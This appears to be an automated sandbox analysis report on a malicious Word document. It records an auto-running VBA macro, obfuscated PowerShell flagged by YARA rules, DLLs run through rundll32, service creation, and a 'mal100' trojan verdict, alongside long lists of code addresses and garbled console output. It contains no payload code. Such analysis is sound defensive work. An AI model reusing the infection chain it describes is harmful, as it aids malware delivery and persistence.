                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025FB04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00259716
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025E360
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00265748
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00254D5F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00264DAD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026C19B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026A7E4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002583F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00254828
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00251600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00263600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00253618
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00260C65
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00265060
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025766F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025D668
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025F471
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00262A7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00261C79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025427A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00268E79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025D04B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025884A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00267A50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025C8A5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00260EA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002672AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002512B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00256ABA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026D08F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026A094
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025F099
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00257AE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00269AE2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025B0E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026A2EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025D2CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025DEC9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002668CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002676D5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002612D1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025E924
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025792C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025BB28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00265D36
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00260705
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00255D0E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00268313
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00262513
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00265B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00268978
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00252746
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00263745
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00256342
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00258F55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026C95E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025DB5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002581A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025B3A2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002567AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00253FAB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025FFB5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026CBB0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002559B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025EF80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00258994
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00253B97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0026B19F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002639E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002533F4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025B7F8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0025C3C2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00216C05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00216E8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00214121
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022533C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021FB04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00219716
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021E360
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225748
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224DAD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022C19B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022A7E4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002183F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00214828
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00211600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00223600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00213618
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225060
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00220C65
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021D668
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021766F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021F471
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00221C79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021427A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00228E79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00222A7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021D04B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021884A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00227A50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00220EA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021C8A5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002272AE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002112B6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00216ABA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022D08F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022A094
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021F099
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00229AE2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021B0E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00217AE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022A2EA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021DEC9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002268CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021D2CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002212D1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002276D5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021E924
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021BB28
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021792C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225D36
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00220705
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00215D0E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00228313
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00222513
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00228978
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00216342
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00212746
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00223745
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00218F55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021DB5B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022C95E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00214D5F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002181A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021B3A2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00213FAB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002167AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022CBB0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021FFB5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002159B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021EF80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00218994
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00213B97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022B19F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002239E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002133F4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021B7F8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0021C3C2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E6C05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E6E8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E9716
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001EFB04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F533C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E4121
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F5748
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001EE360
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FC19B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F4DAD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E83F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001FA7E4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E3618
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E1600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F3600
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E4828
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F7A50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E884A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001ED04B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F2A7D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E427A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F1C79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001F8E79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001EF471
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001E766F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001ED668
                    Source: Informacion_4-09757.docOLE, VBA macro line: Private Sub Document_open()
                    Source: VBA code instrumentationOLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open
                    Source: Informacion_4-09757.docOLE indicator, VBA macros: true
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1000B078 appears 46 times
                    Source: 00000005.00000002.2095452042.0000000001C04000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: 00000005.00000002.2095324924.00000000001E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                    Source: Yvtlx6p4.dll.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.999343417553
                    Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                    Source: classification engineClassification label: mal100.troj.evad.winDOC@28/9@1/4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateServiceW,
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$formacion_4-09757.docJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC706.tmpJump to behavior
                    Source: Informacion_4-09757.docOLE indicator, Word Document stream: true
                    Source: Informacion_4-09757.docOLE document summary: title field not present or empty
                    Source: Informacion_4-09757.docOLE document summary: edited time not present or 0
                    Source: C:\Windows\System32\msg.exeConsole Write: ............?........................... .].......].....................................#...............................h.......5kU.............
                    Source: C:\Windows\System32\msg.exeConsole Write: ............?...H...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........c.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................!..j......................A.............}..v......y.....0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................!..j..... A...............A.............}..v....P.y.....0.l...............c.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v......y.....0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......c...............A.............}..v......y.....0.l...............c.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............Q..j......................A.............}..v....P.{.....0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............Q..j..... A...............A.............}..v......{.....0.l.............h.c.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....Hc...............A.............}..v....P.......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....Hc...............A.............}..v....P.......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....Hc...............A.............}..v....P.......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j......................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.l.............8Ec.....(.......H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j....X.................A.............}..v............0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.l.............8Ec.....$.......H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E./........................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ................A.............}..v.... !......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....Hc...............A.............}..v.....'......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....(................A.............}..v.... )......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....Hc...............A.............}..v...../......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....0................A.............}..v.... 1......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....Hc...............A.............}..v.....7......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....8................A.............}..v.... 9......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......................A.............}..v.....?......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....@................A.............}..v.... A......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....Hc...............A.............}..v.....G......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....H................A.............}..v.... I......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....Hc...............A.............}..v.....O......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....P................A.............}..v.... Q......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....Hc...............A.............}..v.....W......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....X................A.............}..v.... Y......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................A.............}..v....._......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....`................A.............}..v.... a......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v.....g......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....h................A.............}..v.... i......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v.....o......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....p................A.............}..v.... q......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v.....w......0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....x................A.............}..v.... y......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
